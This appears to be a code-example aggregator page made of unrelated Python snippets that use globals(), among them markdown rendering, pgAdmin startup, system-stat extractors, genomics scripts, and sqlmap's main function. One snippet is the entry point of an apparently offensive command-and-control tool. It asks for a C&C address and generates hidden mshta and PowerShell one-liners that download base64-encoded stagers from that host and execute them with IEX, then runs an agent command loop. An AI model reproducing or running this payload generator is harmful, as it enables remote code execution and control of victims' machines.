    #print the_html
    # html?
    if do_html:
        return the_html

    # who wants html, here is our result:
    try:
        ansi = MD.ansi
    except:
        if the_html:
            # can this happen? At least show:
            print("we have markdown result but no ansi.")
            print(the_html)
        else:
            ansi = 'n.a. (no parsing result)'

    # The RAW html within source, incl. fenced code blocks:
    # phs are numbered like this in the md, we replace back:
    PH = markdown.util.HTML_PLACEHOLDER
    stash = MD.htmlStash
    nr = -1
    tags = Tags()
    for ph in stash.rawHtmlBlocks:
        nr += 1
        raw = html_parser.unescape(ph[0])
        if raw[:3].lower() == '<br':
            raw = '\n'
        pre = '<pre><code'
        if raw.startswith(pre):
            _, raw = raw.split(pre, 1)
            if 'class="' in raw:
                # language:
                lang = raw.split('class="', 1)[1].split('"')[0]
            else:
                lang = ''
            raw = raw.split('>', 1)[1].rsplit('</code>', 1)[0]
            raw = tags.code(raw.strip(), from_fenced_block=1, lang=lang)
        ansi = ansi.replace(PH % nr, raw)

    # don't want these: gone through the extension now:
    # ansi = ansi.replace('```', '')

    # sub part display (the -f feature)
    if from_txt:
        if not from_txt.split(':', 1)[0] in ansi:
            # display from top then:
            from_txt = ansi.strip()[1]
        from_txt, mon_lines = (from_txt + ':%s' %
                               (term_rows - 6)).split(':')[:2]
        mon_lines = int(mon_lines)
        pre, post = ansi.split(from_txt, 1)
        post = '\n'.join(post.split('\n')[:mon_lines])
        ansi = '\n(...)%s%s%s' % ('\n'.join(pre.rsplit(
            '\n', 2)[-2:]), from_txt, post)

    ansi = set_hr_widths(ansi) + '\n'
    if no_colors:
        return clean_ansi(ansi)
    return ansi + '\n'
Пример #34
0
import os
import sys

if sys.version_info[0] >= 3:
    import builtins
else:
    import __builtin__ as builtins

# We need to include the root directory in sys.path to ensure that we can
# find everything we need when running in the standalone runtime.
root = os.path.dirname(os.path.realpath(__file__))
if sys.path[0] != root:
    sys.path.insert(0, root)

# Grab the SERVER_MODE if it's been set by the runtime
if 'SERVER_MODE' in globals():
    builtins.SERVER_MODE = globals()['SERVER_MODE']
else:
    builtins.SERVER_MODE = None

# Set null device file path to stdout, stdin, stderr if they are None
for _name in ('stdin', 'stdout', 'stderr'):
    if getattr(sys, _name) is None:
        setattr(sys, _name, open(os.devnull,
                                 'r' if _name == 'stdin' else 'w'))

import config
from pgadmin import create_app
from pgadmin.utils import u, fs_encoding, file_quote

if config.DEBUG:
Пример #35
0
vmstat_path = '/proc/vmstat'
vmstat_pattern = """pgpgin $pgin
pgpgout $pgout
.*
pgfault $pgfault
pgmajfault $pgmajfault"""

snmp_path = '/proc/net/snmp'
snmp_pattern = 'Tcp: \S+ \S+ \S+ \S+ $active_conn $passive_conn' 
netdev_path = '/proc/net/dev'
netdev_pattern = 'eth.: $rbytes $rpackets $rerrs $rdrop +\S+ +\S+ +\S+ +\S+ $sbytes $spackets $serrs $sdrop'

diskstat_path = '/proc/diskstats'
diskstat_pattern = '^ +8 +\S+ +\S+ $read $read_merged $read_sectors $read_time $write $write_merged $write_sectors $write_time $progress_io $io_time $io_time_weighted'
proc_events = [(src, re.findall('\$(\w+)', globals().get(src+'_pattern'))) for src in ('stat', 'meminfo', 'vmstat', 'snmp', 'netdev', 'diskstat')]

get_stat = make_extractor(stat_path, stat_pattern)
get_meminfo = make_extractor(meminfo_path, meminfo_pattern)
get_vmstat = make_extractor(vmstat_path, vmstat_pattern) 
get_snmp = make_extractor(snmp_path, snmp_pattern)
get_netdev = make_extractor_acc(netdev_path, netdev_pattern)
get_diskstat = make_extractor_acc(diskstat_path, diskstat_pattern)

######################################## kperf info extractor ########################################
kperf_events_map = '''
CPU_CLK_UNHALTED.CORE 3c           # cpu_cycles
CPU_CLK_UNHALTED.BUS 13c           # bus_cycles
INST_RETIRED.ANY c0                # insts
ITLB_MISS_RETIRED c9               # itlb_misses
DTLB_MISSES.ANY 108                # dtlb_misses
Пример #36
0
	def queue(self):
		l = PersistentObject(list, "queue.dat", namespace=globals())
		return ListWrapper(self, l)
Пример #37
0
import sys

# for compatibility with easy_install; see #2198
__requires__ = 'alembic==1.5.5'

try:
    from importlib.metadata import distribution
except ImportError:
    try:
        from importlib_metadata import distribution
    except ImportError:
        from pkg_resources import load_entry_point


def importlib_load_entry_point(spec, group, name):
    dist_name, _, _ = spec.partition('==')
    matches = (
        entry_point
        for entry_point in distribution(dist_name).entry_points
        if entry_point.group == group and entry_point.name == name
    )
    return next(matches).load()


globals().setdefault('load_entry_point', importlib_load_entry_point)


if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(load_entry_point('alembic==1.5.5', 'console_scripts', 'alembic')())
Пример #38
0
def main():
    signal.signal(signal.SIGINT, signal_handler)
    header.Banner()
    #config.set_key()
    CC = []
    if config.HOST == "" or config.PORT == "":
        while len(CC) == 0:
            CC = raw_input('Enter a DN/IP:port for C&C: ip:port: ')
        CC = CC.split(':')
        config.set_port(CC[1])
        config.set_ip(CC[0])
    #proxy = raw_input('Enter PROXY:')
    #if proxy:
    #    ip = proxy
    server = threading.Thread(target=webserver.main, args=())
    server.start()
    print '+' + '-' * 60 + '+'
    cmd().help()
    print '+' + '-' * 60 + '+'
    print bcolors.OKBLUE + '(LOW):' + bcolors.ENDC
    print 'mshta http://%s:%s%s' % (config.HOST, config.PORT,
                                    config.hta_payload)
    print 'powershell -c \"mshta http://%s:%s%s\"' % (config.HOST, config.PORT,
                                                      config.hta_payload)
    config.PAYLOADS.append('\nmshta http://%s:%s%s' %
                           (config.HOST, config.PORT, config.hta_payload))
    print ''
    commandJ = "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))}"
    commandP = 'Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(\'{payload}\')))" -WindowStyle Hidden'
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{raw}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload = payload.encode('base64').replace('\n', '')
    print bcolors.OKBLUE + '(MEDIUM):' + bcolors.ENDC
    print '---+Powershell JOB Payload+---\n' + commandJ.replace(
        '{payload}', payload)
    print ''
    print '---+Powershell New Process Payload+---\n' + commandP.replace(
        '{payload}', payload)
    print ''
    config.PAYLOADS.append(commandJ.replace('{payload}', payload))
    config.PAYLOADS.append(commandP.replace('{payload}', payload))
    print bcolors.OKBLUE + '(HIGH):' + bcolors.ENDC
    commandF = "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))"
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{hjf}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{hjf}", hjf_payload)
    payload = payload.encode('base64').replace('\n', '')
    print '---+Powershell JOB + File Payload+---'
    print commandF.replace('{payload}', payload)
    print ''
    config.PAYLOADS.append(commandF.replace('{payload}', payload))
    commandF = "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')))"
    payload = "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{hjfs}');IEX($s)"
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{hjfs}", hjfs_payload)
    payload = payload.encode('base64').replace('\n', '')
    print '---+Powershell JOB + File +SCT Payload+---'
    print commandF.replace('{payload}', payload)
    print ''
    config.PAYLOADS.append(commandF.replace('{payload}', payload))
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{raw}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{raw}", raw_payload)
    print '---+ Powershell simple payloads +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    #=======================================================
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b64stager}", b64_stager)
    print '---+ Powershell base64 stager +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append('---+ Powershell base64 stager +---')
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    #=======================================================
    payload = """powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');Invoke-Expression $h;\""""
    payload2 = """powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');\""""
    payload3 = """powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b52stager}');\""""
    payload = payload.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    payload2 = payload2.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    payload3 = payload3.replace('{ip}', config.HOST).replace(
        '{port}', config.PORT).replace("{b52stager}", b52_stager)
    print '---+ Powershell base52 stager +---'
    print payload
    print payload2
    print payload3
    print ''
    config.PAYLOADS.append('---+ Powershell base52 stager +---')
    config.PAYLOADS.append(payload)
    config.PAYLOADS.append(payload2)
    config.PAYLOADS.append(payload3)
    config.PAYLOAD()
    config.STAGER()
    cspayload()

    print '+' + '-' * 60 + '+'
    while True:
        if config.POINTER == 'main':
            command = raw_input('(%s : %s) ' % (config.BASE, config.POINTER))
        else:
            command = raw_input(
                '(%s : Agent(%s)-%s) ' %
                (config.BASE, str(config.AGENTS[config.POINTER][0]),
                 config.AGENTS[config.POINTER][1]))
        bcommand = command.strip().split()
        if bcommand:
            if bcommand[0] in cmd.COMMANDS:
                result = getattr(globals()['cmd'](), bcommand[0])(bcommand)
            elif bcommand[0] not in cmd.COMMANDS and config.POINTER != 'main':
                config.COMMAND[config.POINTER].append(
                    encrypt(AESKey, command.strip()))
Пример #39
0
import sys
import argparse
import cStringIO

##### parse arguments
parser = argparse.ArgumentParser(description="Scans vcf files and returns lines with somatic/germline mutations. Also cleans up the data a little bit.");
parser.add_argument('-i', '--input', required=True, help="The name of the (parsed) input vcf file.");
parser.add_argument('-s', '--somatic', action='store_true', help="If -s is specified, will output somatic mutations.");
parser.add_argument('-g', '--germline', action='store_true', help="If -g is specified, will output germline mutations.");
parser.add_argument('-a', '--all', action='store_true', help="If -a is specified, will output every line.");
parser.add_argument('-t', '--tcgaid_append', action='store_true', help="If -t is specified, will append the TCGA ID to the end of every line (if the program can find it).");
desc_T = "If -T is specified, will attempt to search for a TCGA ID within the file and output it. This will be the only output.";
parser.add_argument('-T', '--tcgaid_only', action='store_true', help=desc_T);

_args = parser.parse_args();
globals()['args'] = _args;
#####

##### functions #####

# finds the TCGA ID inside the file
# looks at the file name and the first line of the file to see if it can find
# a TCGA ID. If it finds more than one, it uses the longer one.
def findID(file_name,first_line):
    file_name_index = file_name.find("TCGA-");
    first_line_index = first_line.find("TCGA-");
    tcga_id_file = ""
    tcga_id_line = ""
    tcga_id = ""

    if file_name_index != -1:
Пример #40
0
def FindResource(name):
  """Search for a named resource.

  Returns a tuple of (filename, file contents as string), where at
  least one element is not None, depending on the abilities of the
  entity where the resource was found.  E.g. resources from PAR files
  don't have independent filenames.

  Raises IOError if the name is not found, or the resource cannot be opened.
  """

  # 1
  loader = globals().get('__loader__', None)
  if loader and hasattr(loader, 'get_data'):
    try:
      _ResourceLock.acquire()
      try:
        data = loader.get_data(name)
      finally:
        _ResourceLock.release()
      _Log('# loading resource %s via __loader__\n' % (name))
      return (None, data)
    except IOError:
      pass
    # endtry
  # endif

  # 2
  file = globals().get('__file__', None)
  if file:
    # __file__ is like <root>/google{2,3}/pyglib/resources.py
    root_plus_two = os.path.dirname(os.path.abspath(file))
    if root_plus_two and os.path.isdir(root_plus_two):
      root = os.path.dirname(os.path.dirname(root_plus_two))
      filename = os.path.join(root, name)
      if os.path.isfile(filename):
        _Log('# loading resource %s from %s via __file__\n' % (name, filename))
        return (filename, None)
      # endif
    # endif
  # endif

  # 3
  if sys.modules.has_key('sitecustomize'):
    sitecustomize = sys.modules['sitecustomize']
    root = getattr(sitecustomize, 'GOOGLEBASE', None)
    if root and os.path.isdir(root):
      filename = os.path.join(root, name)
      if os.path.isfile(filename):
        _Log('# loading resource %s from %s via sitecustomize\n' % (name,
                                                                    filename))
        return (filename, None)
      # endif
    # endif
  # endif

  # 4
  root = os.environ.get('GOOGLEBASE', None)
  if root and os.path.isdir(root):
    filename = os.path.join(root, name)
    if os.path.isfile(filename):
      _Log('# loading resource %s from %s via GOOGLEBASE\n' % (name, filename))
      return (filename, None)
    # endif
  # endif

  # 5 see if the file is under a READONLY srcfs path
  # First check make-dbg or mach style relative srcfs.
  if name.startswith("../READONLY"):
    return (name, None)
  # Next check blaze style full paths.
  # Blaze input is like "/home/foo/client/google3/path/to/file.txt"
  # Find the google3 dir within the name and see if it has a READONLY
  readonly_path = None
  resource_name = None
  head = name
  # Start at the back of the path and go until google3.
  # This assumes there's no google3 anywhere else in the path.
  # Note: os.path.split('/') returns ('/', '') and
  # os.path.split('foo') return ('', 'foo').
  # Thus we know that we have run out of path components when head is
  # equal to '/' or the empty string.
  while readonly_path is None and head != '' and head != '/':
    (head, tail) = os.path.split(head)
    if resource_name is not None:
      resource_name = os.path.join(tail, resource_name)
    else:
      resource_name = tail

    if tail == 'google3':
      readonly_path = os.path.join(head, 'READONLY')
    # endif
  #endwhile
  if readonly_path is not None:
    filename = os.path.join(readonly_path, resource_name)
    if os.path.isfile(filename):
      _Log('# loading resource %s from %s via srcfs READONLY\n' % (name,
                                                                 filename))
      return (filename, None)
    # endif
  #endif

  raise IOError(errno.ENOENT, 'Resource not found', name)
Пример #41
0
def get_action(cur_state, strategy_function):
    return globals()[strategy_function](cur_state)
Пример #42
0
def main(argv=None):
    """script main.

    parses command line options in sys.argv, unless *argv* is given.
    """

    if argv is None:
        argv = sys.argv

    parser = E.OptionParser(
        version="%prog version: $Id: diff_gff.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])

    parser.add_option("-e", "--write-equivalent", dest="write_equivalent",
                      help="write equivalent entries [default=%default].", action="store_true")

    parser.add_option("-f", "--write-full", dest="write_full",
                      help="write full gff entries [default=%default].", action="store_true")

    parser.add_option("-o", "--format=", dest="format",
                      help="output format [flat|multi-line] [default=%default]")

    parser.add_option("-p", "--add-percent", dest="add_percent", action="store_true",
                      help="add percentage columns [default=%default].")

    parser.add_option("-a", "--as-gtf", "--is-gtf", dest="as_gtf", action="store_true",
                      help="input is in gtf format. Output on overlapping genes will be output [default=%default].")

    parser.add_option("-s", "--ignore-strand", dest="ignore_strand", action="store_true",
                      help="ignore strand information [default=%default].")

    parser.set_defaults(
        write_equivalent=False,
        write_full=False,
        format="flat",
        add_percent=False,
        ignore_strand=False,
        as_gtf=False,
    )

    (options, args) = E.Start(parser, add_output_options=True)

    if len(args) != 2:
        raise ValueError("two arguments required")

    input_filename1, input_filename2 = args

    # duplicated features cause a problem. Make sure
    # features are non-overlapping by running
    # gff_combine.py on GFF files first.

    E.info("reading data")

    if options.as_gtf:
        gff1 = GTF.readFromFile(IOTools.openFile(input_filename1, "r"))
        gff2 = GTF.readFromFile(IOTools.openFile(input_filename2, "r"))
        overlaps_genes = []
    else:
        gff1 = GTF.readFromFile(IOTools.openFile(input_filename1, "r"))
        gff2 = GTF.readFromFile(IOTools.openFile(input_filename2, "r"))

    E.info("reading data finished: %i, %i" % (len(gff1), len(gff2)))

    # removing everything but exons
    gff1 = [x for x in gff1 if x.feature == "exon"]
    gff2 = [x for x in gff2 if x.feature == "exon"]

    E.info("after keeping only 'exons': %i, %i" % (len(gff1), len(gff2)))

    if options.ignore_strand:
        for e in gff1:
            e.strand = "."
        for e in gff2:
            e.strand = "."

    E.info("sorting exons")

    gff1.sort(key=lambda x: (x.contig, x.strand, x.start, x.end))
    gff2.sort(key=lambda x: (x.contig, x.strand, x.start, x.end))

    E.info("sorting exons finished")

    subtotals = []
    subtotal = Counts(add_percent=options.add_percent)

    outfile_diff = getFile(options, "diff")
    outfile_overlap = getFile(options, "overlap")

    if options.as_gtf:
        overlapping_genes = []
    else:
        overlapping_genes = None

    i1, i2 = 0, 0
    n1 = len(gff1)
    n2 = len(gff2)
    first_entry2, first_entry1 = None, None

    while i1 < n1 and i2 < n2:

        entry1 = gff1[i1]
        entry2 = gff2[i2]

        E.debug("1: i1=%i n1=%i entry1=%s" % (i1, n1, str(entry1)))
        E.debug("2: i2=%i n2=%i entry2=%s" % (i2, n2, str(entry2)))

        # when chromosome/strand have changed in both (and are the same), print
        # summary info:
        if first_entry1:

            if (first_entry1.contig != entry1.contig or
                first_entry1.strand != entry1.strand) and \
                (first_entry2.contig != entry2.contig or
                 first_entry2.strand != entry2.strand) and \
                    entry1.contig == entry2.contig and \
                    entry1.strand == entry2.strand:

                subtotals.append(
                    (first_entry1.contig, first_entry1.strand, subtotal))
                subtotal = Counts(add_percent=options.add_percent)
                first_entry1 = entry1
                first_entry2 = entry2

        else:
            first_entry1 = entry1
            first_entry2 = entry2

        output_1, output_2 = None, None

        if GTF.Overlap(entry1, entry2):

            # collect multiple matches
            last_l = True
            while GTF.Overlap(entry1, entry2):

                if overlapping_genes is not None:
                    overlapping_genes.append((entry1.gene_id, entry2.gene_id))

                write_last = True
                subtotal.noverlap += 1
                if entry1.start == entry2.start and entry1.end == entry2.end:
                    symbol = "="
                    subtotal.nidentical += 1
                elif entry1.start == entry2.start or entry1.end == entry2.end:
                    symbol = "|"
                    subtotal.nhalf += 1
                else:
                    symbol = "~"

                output_1 = entry1
                output_2 = entry2

                if entry1.end < entry2.end:
                    i1 += 1
                    subtotal.nleft += 1
                    last_l = True

                    if i1 >= n1:
                        i2 += 1
                        break

                    entry1 = gff1[i1]
                    if GTF.Overlap(entry1, entry2):
                        symbol = "/"
                        # outfile.write( "# split right\n" )
                        subtotal.nsplit_right += 1

                else:
                    i2 += 1
                    subtotal.nright += 1
                    last_l = False

                    if i2 >= n2:
                        i1 += 1
                        break

                    entry2 = gff2[i2]
                    if GTF.Overlap(entry1, entry2):
                        symbol = "\\"
                        # outfile.write("# split left\n")
                        subtotal.nsplit_left += 1

                # output at the end, so that symbol is known
                if options.write_equivalent:
                    if options.format == "flat":
                        outfile_overlap.write(
                            "%s\t%s\t%s\n" % (symbol, str(output_1), str(output_2)))
                    elif options.format == "multi-line":
                        outfile_overlap.write(
                            "%s\t%s\n\t%s\n" % (symbol, str(output_1), str(output_2)))

                write_last = False

            if write_last and output_1 and output_2 and options.write_equivalent:
                if options.format == "flat":
                    outfile_overlap.write(
                        "%s\t%s\t%s\n" % (symbol, str(output_1), str(output_2)))
                elif options.format == "multi-line":
                    outfile_overlap.write(
                        "%s\t%s\n\t%s\n" % (symbol, str(output_1), str(output_2)))

            # if last advance was left, go right, and vice versa
            if last_l:
                i2 += 1
                subtotal.nright += 1
            else:
                i1 += 1
                subtotal.nleft += 1

        elif _cmp(entry1, entry2) < 0:
            outfile_diff.write("<\t%s\n" % str(entry1))
            subtotal.nunique_left += 1
            i1 += 1
            subtotal.nleft += 1

        elif _cmp(entry1, entry2) > 0:
            outfile_diff.write(">\t%s\n" % str(entry2))
            subtotal.nunique_right += 1
            i2 += 1
            subtotal.nright += 1

    while i1 < n1:
        outfile_diff.write("<\t%s\n" % str(entry1))
        subtotal.nunique_left += 1
        i1 += 1
        if i1 >= n1:
            break
        entry1 = gff1[i1]
        subtotal.nleft += 1

    while i2 < n2:
        outfile_diff.write(">\t%s\n" % str(entry2))
        subtotal.nunique_right += 1
        i2 += 1
        if i2 >= n2:
            break
        entry2 = gff2[i2]
        subtotal.nright += 1

    subtotals.append((entry1.contig, entry1.strand, subtotal))

    if outfile_diff != options.stdout:
        outfile_diff.close()
    if outfile_overlap != options.stdout:
        outfile_overlap.close()

    ##################################################################
    ##################################################################
    ##################################################################
    # print gene based information
    ##################################################################
    if overlapping_genes:
        outfile = getFile(options, "genes_ovl")
        s = set(overlapping_genes)
        outfile.write("gene_id1\tgene_id2\n")
        for a, b in s:
            outfile.write("%s\t%s\n" % (a, b))
        if outfile != options.stdout:
            outfile.close()

        outfile_total = getFile(options, "genes_total")
        outfile_total.write(
            "set\tngenes\tnoverlapping\tpoverlapping\tnunique\tpunique\n")

        outfile = getFile(options, "genes_uniq1")
        a = set([x.gene_id for x in gff1])
        b = set([x[0] for x in s])
        d = a.difference(b)
        outfile.write("gene_id1\n")
        outfile.write("\n".join(d) + "\n")
        if outfile != options.stdout:
            outfile.close()
        outfile_total.write("%s\t%i\t%i\t%5.2f\t%i\t%5.2f\n" % (
            os.path.basename(input_filename1), len(
                a), len(b), 100.0 * len(b) / len(a),
            len(d), 100.0 * len(d) / len(a)))

        outfile = getFile(options, "genes_uniq2")
        a = set([x.gene_id for x in gff2])
        b = set([x[1] for x in s])
        d = a.difference(b)
        outfile.write("gene_id2\n")
        outfile.write("\n".join(d) + "\n")
        if outfile != options.stdout:
            outfile.close()

        outfile_total.write("%s\t%i\t%i\t%5.2f\t%i\t%5.2f\n" % (
            os.path.basename(input_filename2), len(
                a), len(b), 100.0 * len(b) / len(a),
            len(d), 100.0 * len(d) / len(a)))
        if outfile_total != options.stdout:
            outfile_total.close()

    ##################################################################
    ##################################################################
    ##################################################################
    # print totals
    ##################################################################
    outfile = getFile(options, "total")
    outfile.write("chr\tstrand\t%s\n" %
                  Counts(add_percent=options.add_percent).getHeader())

    total = Counts(add_percent=options.add_percent)
    for x in subtotals:
        outfile.write("\t".join((x[0], x[1], str(x[2]))) + "\n")
        total += x[2]

    outfile.write("\t".join(("all", "all", str(total))) + "\n")

    if outfile != options.stdout:
        outfile.close()

    E.Stop()
Пример #43
0
import web
import ardustat_library_no_class as ard
import socket

urls = (
	'/','generic'	
)


app = web.application(urls, globals())

class generic:
	def GET(self):
		web.header('Content-Type','text/html; charset=utf-8', unique=True)	
		try:
			ard.connect(7777)
		except:
			foo = "whoops"
		ard.blink()
		return ard.parsedread()
		

if __name__ == "__main__": app.run()
parser= argparse.ArgumentParser()
parser.add_argument('--rootDir', help= 'the root directory containing data and scripts')
parser.add_argument('--libSetFile', help = 'libset file')
parser.add_argument('--threadNumb', help= 'number of threads')
args = parser.parse_args()
sys.path.append("%s/riboseq" % args.rootDir)
sys.path.append("%s/riboseq/libsettings" % args.rootDir)
import rphelper as rph

rootDir = args.rootDir
libsetName = args.libSetFile
libset = importlib.import_module("%s" % libsetName)
for attr in dir(libset):
	if not attr.startswith("_"):
		globals()[attr] = getattr(libset, attr)
threadNumb = str(args.threadNumb)


samplelist = [samplelist[18]]+[samplelist[20]]

### set inputs here:

defaultInsets = { 'utr5Inset3' : 6, 'cdsInset5' : 18, 'cdsInset3' : 15, 'utr3Inset5' : 6 }
zeroInsets    = { 'utr5Inset3' : 0, 'cdsInset5' : 0, 'cdsInset3' : 0, 'utr3Inset5' : 0 }
# insets= defaultInsets
insets= zeroInsets


UTRdict = rph.readindict(open(UTRfilestring, "rU"))
Пример #45
0
async def entry_point(module, session):
    func = globals()[("_" + module.params["state"])]
    return await func(module.params, session)
Пример #46
0
import copy
import datetime
import os
import socket

from gluon._compat import iteritems
import gluon.contenttype
import gluon.fileutils


is_gae = request.env.web2py_runtime_gae or False

# ## critical --- make a copy of the environment

global_env = copy.copy(globals())
global_env['datetime'] = datetime

http_host = request.env.http_host.split(':')[0]
remote_addr = request.env.remote_addr
try:
    hosts = (http_host, socket.gethostname(),
             socket.gethostbyname(http_host),
             '::1', '127.0.0.1', '::ffff:127.0.0.1')
except:
    hosts = (http_host, )

if request.is_https:
    session.secure()
elif (remote_addr not in hosts) and (remote_addr != "127.0.0.1") and \
    (request.function != 'manage'):
Пример #47
0
def main():
    """
    Main function of sqlmap when running from command line.
    """

    try:
        dirtyPatches()
        resolveCrossReferences()
        checkEnvironment()
        setPaths(modulePath())
        banner()

        # Store original command line options for possible later restoration
        args = cmdLineParser()
        cmdLineOptions.update(
            args.__dict__ if hasattr(args, "__dict__") else args)
        initOptions(cmdLineOptions)

        if checkPipedInput():
            conf.batch = True

        if conf.get("api"):
            # heavy imports
            from lib.utils.api import StdDbOut
            from lib.utils.api import setRestAPILog

            # Overwrite system standard output and standard error to write
            # to an IPC database
            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
            setRestAPILog()

        conf.showTime = True
        dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER,
                     forceOutput=True)
        dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"),
                     forceOutput=True)

        init()

        if not conf.updateAll:
            # Postponed imports (faster start)
            if conf.smokeTest:
                from lib.core.testing import smokeTest
                os._exitcode = 1 - (smokeTest() or 0)
            elif conf.vulnTest:
                from lib.core.testing import vulnTest
                os._exitcode = 1 - (vulnTest() or 0)
            elif conf.fuzzTest:
                from lib.core.testing import fuzzTest
                fuzzTest()
            else:
                from lib.controller.controller import start
                if conf.profile:
                    from lib.core.profiling import profile
                    globals()["start"] = start
                    profile()
                else:
                    try:
                        if conf.crawlDepth and conf.bulkFile:
                            targets = getFileItems(conf.bulkFile)

                            for i in xrange(len(targets)):
                                target = None

                                try:
                                    kb.targets.clear()
                                    target = targets[i]

                                    if not re.search(r"(?i)\Ahttp[s]*://",
                                                     target):
                                        target = "http://%s" % target

                                    infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (
                                        target, i + 1, len(targets))
                                    logger.info(infoMsg)

                                    crawl(target)
                                except Exception as ex:
                                    if target and not isinstance(
                                            ex, SqlmapUserQuitException):
                                        errMsg = "problem occurred while crawling '%s' ('%s')" % (
                                            target, getSafeExString(ex))
                                        logger.error(errMsg)
                                    else:
                                        raise
                                else:
                                    if kb.targets:
                                        start()
                        else:
                            start()
                    except Exception as ex:
                        os._exitcode = 1

                        if "can't start new thread" in getSafeExString(ex):
                            errMsg = "unable to start new threads. Please check OS (u)limits"
                            logger.critical(errMsg)
                            raise SystemExit
                        else:
                            raise

    except SqlmapUserQuitException:
        if not conf.batch:
            errMsg = "user quit"
            logger.error(errMsg)

    except (SqlmapSilentQuitException, bdb.BdbQuit):
        pass

    except SqlmapShellQuitException:
        cmdLineOptions.sqlmapShell = False

    except SqlmapBaseException as ex:
        errMsg = getSafeExString(ex)
        logger.critical(errMsg)

        os._exitcode = 1

        raise SystemExit

    except KeyboardInterrupt:
        print()

    except EOFError:
        print()

        errMsg = "exit"
        logger.error(errMsg)

    except SystemExit as ex:
        os._exitcode = ex.code or 0

    except:
        print()
        errMsg = unhandledExceptionMessage()
        excMsg = traceback.format_exc()
        valid = checkIntegrity()

        os._exitcode = 255

        if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")):
            errMsg = "memory exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded",
                                       "Disk full while accessing")):
            errMsg = "no space left on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("The paging file is too small", )):
            errMsg = "no space left for paging file"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("Access is denied", "subprocess", "metasploit")):
            errMsg = "permission error occurred while running Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Permission denied", "metasploit")):
            errMsg = "permission error occurred while using Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif "Read-only file system" in excMsg:
            errMsg = "output device is mounted as read-only"
            logger.critical(errMsg)
            raise SystemExit

        elif "Insufficient system resources" in excMsg:
            errMsg = "resource exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif "OperationalError: disk I/O error" in excMsg:
            errMsg = "I/O error on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif "Violation of BIDI" in excMsg:
            errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)"
            logger.critical(errMsg)
            raise SystemExit

        elif "Invalid IPv6 URL" in excMsg:
            errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

